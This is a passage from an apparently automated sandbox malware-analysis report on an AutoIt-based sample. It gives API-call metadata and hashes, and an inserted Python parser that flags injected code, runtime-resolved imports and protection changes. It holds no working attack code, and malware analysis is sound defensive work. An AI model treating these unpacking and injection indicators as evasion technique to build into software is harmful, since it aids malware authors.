                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: a9cdd8489c80f2d6690be6a42c69c02090c667632164baa1224664e2910c2f93
                                      • Instruction ID: b35b16167ce8a48e5c820329b836a8c4d8d8334a2f60e4f7ac68fb33df12ab33
                                      • Opcode Fuzzy Hash: a9cdd8489c80f2d6690be6a42c69c02090c667632164baa1224664e2910c2f93
                                      • Instruction Fuzzy Hash: F4D15A75E0420AEFDB14EFD8D8819ADFBB5FF48320F14415AE915AB291DB30AD81CB91
                                      APIs
                                        • Part of subcall function 01392AD8: GetFileAttributesW.KERNELBASE(?), ref: 01392AE3
                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 013933C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AttributesCreateDirectoryFile
                                      • String ID:
                                      • API String ID: 3401506121-0
                                      • Opcode ID: 3d36b3da96bb434a09e632d702a32f58a5c23738ca89f7d7b688686f2a213ea2
                                      • Instruction ID: 91147891a2a9620234689d2d4b14ebb82069a7e2b1809fb04aeabe41b4d4f6ba
                                      • Opcode Fuzzy Hash: 3d36b3da96bb434a09e632d702a32f58a5c23738ca89f7d7b688686f2a213ea2
                                      • Instruction Fuzzy Hash: BD516E71A10209A6EF14DFB4D844BEF733AFF58700F00456DE60DE7290EA799A85CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 8561221120838ec1b89dd5d3674560e1fb6c852bbe6975aa677f7ceb364705ba
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 2E31D375A00109DBDB1CEF59D480969FBA5FF89308B28C6A5E909CB656D731EEC1CBC0
                                      APIs
                                        • Part of subcall function 00884E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E9C
                                        • Part of subcall function 00884E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884EAE
                                        • Part of subcall function 00884E90: FreeLibrary.KERNEL32(00000000,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EC0
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EFD
                                        • Part of subcall function 00884E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E62
                                        • Part of subcall function 00884E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884E74
                                        • Part of subcall function 00884E59: FreeLibrary.KERNEL32(00000000,?,?,008C3CDE,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E87
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressFreeProc
                                      • String ID:
                                      • API String ID: 2632591731-0
                                      • Opcode ID: 5cb913f15105cf838e85e36c05f0f67c1912bdce08b9ed613e160e5e2ad80528
                                      • Instruction ID: 7d931574b49efa688b0c474d7c3c7d96dde3cd5612353a45d6f9e734065bde4b
                                      • Opcode Fuzzy Hash: 5cb913f15105cf838e85e36c05f0f67c1912bdce08b9ed613e160e5e2ad80528
                                      • Instruction Fuzzy Hash: 1311E332650206AADB24BF68DC02FAD77A5FF40714F10842EF642E61C1EE70DE459751
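The two blocks above are the ones an analyst reads first in a dump like this: a CreateDirectoryW function whose memory region is marked "based on PE: false" (code that is not backed by the image on disk), and a LoadLibraryA/GetProcAddress pair that resolves Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection by name at runtime. The following parser is an added example for this page; it is not Joe Sandbox code and not code recovered from the sample. It reads the plain-text "APIs / Memory Dump Source / Similarity" layout used throughout this report, splits it into per-function records and flags non-PE-backed code, runtime-resolved imports, MapVirtualKeyW modifier-key mapping and VirtualProtect. The SAMPLE string is constructed from lines of this report; the VK_* names are the standard Windows virtual-key constants; treating the "API ID" token "ProtectVirtual" as a stand-in for a VirtualProtect call is an assumption, used only because one block above has that API ID and an empty APIs list.

```python
"""Parse Joe Sandbox per-function metadata blocks and triage the API calls.

Added example for this report page; not Joe Sandbox code and not code from
the sample. Input is the plain-text layout used above: an 'APIs' list, a
'Memory Dump Source' line and the 'Similarity' fields. SAMPLE is constructed
from lines of this report (three functions, trimmed).
"""
import re

SAMPLE = """\
APIs
  • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00881BF4
  • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00881BFC
  • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00881C1A
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088136A
• OleInitialize.OLE32 ref: 00881388
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
APIs
  • Part of subcall function 01392AD8: GetFileAttributesW.KERNELBASE(?), ref: 01392AE3
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 013933C4
Memory Dump Source
• Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
Similarity
• API ID: AttributesCreateDirectoryFile
APIs
  • Part of subcall function 00884E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00884EDD,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884E9C
  • Part of subcall function 00884E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884EAE
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884EFD
Memory Dump Source
• Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: Library$Load$AddressFreeProc
"""

# One call site: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional (args), then "ref: <address>". The comma before "ref" is optional
# because argument-less calls print as "OleInitialize.OLE32 ref: ...".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SRC_RE = re.compile(
    r"^•\s*Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-F]+),"
    r" based on PE: (?P<pe>true|false)$"
)
FIELD_RE = re.compile(r"^•\s*([^:]+): ?(.*)$")
HEX8 = re.compile(r"^[0-9A-F]{8}$")

# Standard Windows virtual-key codes for the modifier keys seen in this report.
VK_NAMES = {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL",
            0x12: "VK_MENU", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


def parse_blocks(text):
    """Split the dump into per-function dicts with keys apis, source, fields."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # A block starts at "APIs", or at "Memory Dump Source" when the
        # function has no API list and the previous block is already complete.
        if line == "APIs" or (line == "Memory Dump Source"
                              and cur is not None and "source" in cur):
            cur = {"apis": [], "fields": {}}
            blocks.append(cur)
            continue
        if cur is None:
            cur = {"apis": [], "fields": {}}
            blocks.append(cur)
        m = API_RE.match(line)
        if m:
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] is not None else []
            cur["apis"].append(call)
            continue
        m = SRC_RE.match(line)
        if m:
            cur["source"] = m.groupdict()
            continue
        m = FIELD_RE.match(line)
        if m:  # Associated, Snapshot File, API ID, Opcode ID, ... (may repeat)
            cur["fields"].setdefault(m.group(1), []).append(m.group(2))
    return blocks


def triage(block):
    """Return analyst-facing findings for one function block."""
    findings = []
    src = block.get("source")
    if src and src["pe"] == "false":
        findings.append(f"code at {src['off']} is not backed by a PE image "
                        "(candidate unpacked or injected code)")
    for call in block["apis"]:
        # GetProcAddress(hModule, "Name"): a symbolic second argument means the
        # import is resolved at runtime rather than through the import table.
        if (call["name"] == "GetProcAddress" and len(call["args"]) > 1
                and call["args"][1] != "?" and not HEX8.match(call["args"][1])):
            findings.append(f"resolves {call['args'][1]} at runtime via GetProcAddress")
    vks = [VK_NAMES.get(int(c["args"][0], 16), c["args"][0])
           for c in block["apis"]
           if c["name"] == "MapVirtualKeyW" and c["args"] and HEX8.match(c["args"][0])]
    if vks:
        findings.append("maps virtual keys to scan codes: " + ", ".join(vks))
    # Assumption: the "API ID" field is a token summary of the called APIs, so
    # "ProtectVirtual" stands in for VirtualProtect when the APIs list is empty.
    api_id = block["fields"].get("API ID", [""])[0]
    if any(c["name"] == "VirtualProtect" for c in block["apis"]) or "ProtectVirtual" in api_id:
        findings.append("changes page protections (VirtualProtect)")
    return findings


def triage_report(text):
    """(offset, findings) per function, in report order."""
    return [(b.get("source", {}).get("off", "?"), triage(b)) for b in parse_blocks(text)]


if __name__ == "__main__":
    for off, found in triage_report(SAMPLE):
        print(off, found or ["nothing flagged"])
```

Run against the full report text, the parser yields one record per function; the fuzzy hashes and ID fields are carried through untouched under fields so they can be compared across reports, and the findings list is what to paste into a triage note. The "based on PE: false" check is the important one here: it marks the 01392000 region as code the sandbox could not map back to the on-disk image, which is where an unpacked payload is normally found.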
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: 27d9446163fbb182e01691068916ed9c9b46b39f111d48d9440925fdeb9291e5
                                      • Instruction ID: 2238151445153cbfa06d58f5a572b2c0aca4301b5d5688a2dd261a682de0625f
                                      • Opcode Fuzzy Hash: 27d9446163fbb182e01691068916ed9c9b46b39f111d48d9440925fdeb9291e5
                                      • Instruction Fuzzy Hash: 0A11F57590420AEFCB05DF58E941ADA7BF9FF48314F104059F808EB312DA31DA15CBA5
                                      APIs
                                        • Part of subcall function 008B4C7D: RtlAllocateHeap.NTDLL(00000008,00881129,00000000), ref: 008B4CBE
                                      • _free.LIBCMT ref: 008B506C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                      • Instruction ID: e7f9b20b27bf42c2c0c98e1274ea5d9f00fd8958927035f262fb3a168e5dbad5
                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                      • Instruction Fuzzy Hash: 27012672204B056BE321DE699881A9AFBE8FB89370F25051DE184C3380EA30A806C6B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                      • Instruction ID: 5b4df9388b642191c08c648c224625f9d3e0975d4d2ccc078e62504fce6380ff
                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                      • Instruction Fuzzy Hash: 3EF0D132510A14A6E6313E6D8C09B9A379CFF63334F140F15F426D2AD2DA749806C6AA
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00881129,00000000), ref: 008B4CBE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7cef05842524357178144f94371692aa93a9919fa0b1067d272c6d6de5384564
                                      • Instruction ID: e876cd3c1dafc6a09fd86eb1e6f63af9f65b61b6bdb1bccb60834c818c6358f0
                                      • Opcode Fuzzy Hash: 7cef05842524357178144f94371692aa93a9919fa0b1067d272c6d6de5384564
                                      • Instruction Fuzzy Hash: E9F0243120622867EB211F669C16BDA3F88FF81BA1B146121F819E6383CAB0DC0082E0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: c7ef6231cf9e61a5f14dc73eaf2a214d78e0cde3529c3b23033ed82a9a41366b
                                      • Instruction ID: dbf0cb134de73e8141d98b2a1db4e33c61fd8124e82548575c89159cae94d7c1
                                      • Opcode Fuzzy Hash: c7ef6231cf9e61a5f14dc73eaf2a214d78e0cde3529c3b23033ed82a9a41366b
                                      • Instruction Fuzzy Hash: B2E0E53114422567EB2126AB9C00BDA3648FB827B0F060030BC14D2B91DBA0EE0182E3
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00951418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00884F6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 3fd7a016c2d1eb3d460131ea484698cc80ce3f3976bdeddf3644ee5c5600bfce
                                      • Instruction ID: 1669959087c2c0666fb828d81290c945103dfe4758996db80f1a9e8eca317bac
                                      • Opcode Fuzzy Hash: 3fd7a016c2d1eb3d460131ea484698cc80ce3f3976bdeddf3644ee5c5600bfce
                                      • Instruction Fuzzy Hash: 29F03072145752CFDB34AF64D490812B7E4FF143193159D7EE2DAC2511CB319844DF10
                                      APIs
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,008CEE51,00943630,00000002), ref: 008ECD26
                                        • Part of subcall function 008ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,008ECD19,?,?,?), ref: 008ECC59
                                        • Part of subcall function 008ECC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,008ECD19,?,?,?,?,008CEE51,00943630,00000002), ref: 008ECC6E
                                        • Part of subcall function 008ECC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,008ECD19,?,?,?,?,008CEE51,00943630,00000002), ref: 008ECC7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$Pointer$Write
                                      • String ID:
                                      • API String ID: 3847668363-0
                                      • Opcode ID: 725aa1ccfce5eb914149c50450f4e97e6b590888a8634a09a12f5488e7bb4ac8
                                      • Instruction ID: 40112e7f5647440d91dff9b30e85fb03bf7da14be901d710968a12c460671922
                                      • Opcode Fuzzy Hash: 725aa1ccfce5eb914149c50450f4e97e6b590888a8634a09a12f5488e7bb4ac8
                                      • Instruction Fuzzy Hash: F3E06D7A900704FFC7219F8ADD008AABBF8FF85360710852FE996C2110D3B1AA55EB60
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00882DC4
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongNamePath_wcslen
                                      • String ID:
                                      • API String ID: 541455249-0
                                      • Opcode ID: 805add349509dc20cb49f5cc8ba100ea56579949284e2e4cca57b19d2c1771c8
                                      • Instruction ID: 9f6b8347e89106f9ff90c0e2f3fa0e5aaab76241a0e42043a99dc0a5732c2305
                                      • Opcode Fuzzy Hash: 805add349509dc20cb49f5cc8ba100ea56579949284e2e4cca57b19d2c1771c8
                                      • Instruction Fuzzy Hash: DFE0CD726042245BCB10A25C9C09FDA77EDEFC8790F044075FD09D7248D970ED80C651
                                      APIs
                                        • Part of subcall function 00883837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00883908
                                        • Part of subcall function 0088D730: GetInputState.USER32 ref: 0088D807
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00882B6B
                                        • Part of subcall function 008830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0088314E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                      • String ID:
                                      • API String ID: 3667716007-0
                                      • Opcode ID: d4fdb8e609c071de84f50e140e3bde13bf4f061bedeec12b02ba892560440e38
                                      • Instruction ID: 5dc35d25c066eb68223553724769aa995477cdf1299ebf6b677f627b112abd4e
                                      • Opcode Fuzzy Hash: d4fdb8e609c071de84f50e140e3bde13bf4f061bedeec12b02ba892560440e38
                                      • Instruction Fuzzy Hash: 7AE0862130434506CA14BB7DA8525BDA759FBD5756F40153EF542C71B2CE2449498353
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?), ref: 01392AE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                      • Instruction ID: 4f99e215684ec3bbd5c8de3f3114d587df824b29a049ca6ca265a1584f7965fa
                                      • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                      • Instruction Fuzzy Hash: 89E08C7194960CFBDF25CEAC8908AAE77E8EB05324F004654E906C3280D5348A04D750
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?), ref: 01392AB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                      • Instruction ID: 030e09c3bbb7faeb8d94928282f9f735fb6192d0b1caab48f5560d16719f35c0
                                      • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
